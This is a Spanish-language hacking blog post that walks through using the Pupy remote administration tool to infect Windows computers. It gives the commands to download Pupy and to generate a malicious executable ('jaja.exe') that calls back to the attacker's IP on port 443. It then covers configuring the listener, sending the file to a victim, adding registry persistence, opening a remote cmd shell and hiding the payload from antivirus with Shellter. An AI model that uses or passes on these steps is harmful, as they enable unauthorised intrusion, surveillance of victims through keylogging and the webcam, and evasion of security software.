HACKER ANGELWHITE GALC

sábado, 3 de octubre de 2015

Pupy - Remote Administration Tool


Saludos mis queridos lectores en esta oportunidad vengo a presentar una nueva herramienta salida del horno,llamada Pupy la cual tiene como función infectar ordenadores al estilo de msfconsole pero con un estilo mas complejo, Pupy utiliza inyección dll reflexiva y no deja rastros en el disco.

Módulos implementadas:


  • migrar (Windows)
  • entre la inyección arquitectura de procesos también trabaja (x86> x64 y x64-> x86)
  • keylogger (Windows)
  • persistencia (Windows)
  • captura de pantalla (Windows)
  • instantánea cámara web (Windows)
  • ejecución de comandos
  • descargar
  • subir
  • Proxy socks5
  • reenvío de puerto local
  • shell interactiva (cmd.exe, / bin / sh, ...)
  • shell python interactiva
  • exec shellcode (gracias a @ byt3bl33d3r)
Descarga:
Antes de instalar Pupy debemos instalar  el complemento rpyc para poder ejecutar el servidor de nuestro pupy y arranque correctamente, entonces pasaremos a descargarlo e instalarlo.


root@kali:~/rpyc-master# pip install rpyc

Como vemos ha sido instalado correctamente los repertorios correctamente, entonces lo que haremos sera descargar el pupy y luego lo extraeremos 


root@kali:~# wget https://github.com/n1nj4sec/pupy/archive/master.zip

root@kali:~# unzip master.zip

luego de ello, entraremos a la carpeta y ejecutaremos el archivo : pupygen.py


root@kali:~/pupy-master/pupy# python pupygen.py -h

como vemos nos arroja las opciones donde podemos crear nuestro payload, hay diferentes arquitecturas para compatibilidad de los ejecutables,la opción de conexión de nuestra IP y el puerto de escucha, entonces vamos 

python pupygen.py -t exe_x86 -o jaja.exe -p 443 192.168.179.129

el nombre del archivo malioso es jaja.exe ,xD no es nada complicado solo ejecutamos el tipo de arquitectura que deseamos compilar el ejecutable y nuestra ip y el puerto, luego de ello configuramos el archivo de arranque del servidor de pupy server por nano en la terminal.

nano pupy.conf 






















el la primera linea añadir la IP de ustedes donde añadieron anteriormente en el payload de pupy, igualmente el mismo puerto.















como vemos ya tenemos cargando nuestro servidor para recibir las conexiones entrantes de nuestras victimas, ahora solo mandaríamos el archivo nuestra victima.










Una ves que nuestra victima ejecute el archivo, automáticamente tenemos su sesión meterpreter corriendo como vemos en la siguiente imagen.






















para poder ver los comandos añaden help como en la imagen anterior.

para ver nuestros clientes que están infectados y la info de los sistemas, en mi caso como es solo un objetivo nos arroja solamente 2 de uno.




















para poder ejecutar nuestra opciones de los módulos que podemos interactuar con nuestro sistema comprometido con el comando : list_modules

























lo que haremos sera crear nuestro backdoor persistente y que se ejecute cada ves que se apage el equipo de la victima, utilizaremos run persistence -m registry , en la consola del meterpreter.














para ejecutar cualquier proceso debemos añadir primero run y luego el comando de ejecución como vemos en la imagen, ahora ejecutare el siguiente comando, para conectarme a la terminal de cmd de windows.



























Si deseas ponerlo indetectable  el ejecutable, puedes hacerlo con shellter ya que hace la misma función de un meterpreter para pupy.

link del articulo :

http://backtrack-omar.blogspot.com/2015/10/evadiendo-av-codificando-payloads-con.html


Ante mano les deseo un saludo a todos mis fieles lectores de mi humilde blog!
Happy Hacking CyberPunks!!!

No hay comentarios:

Publicar un comentario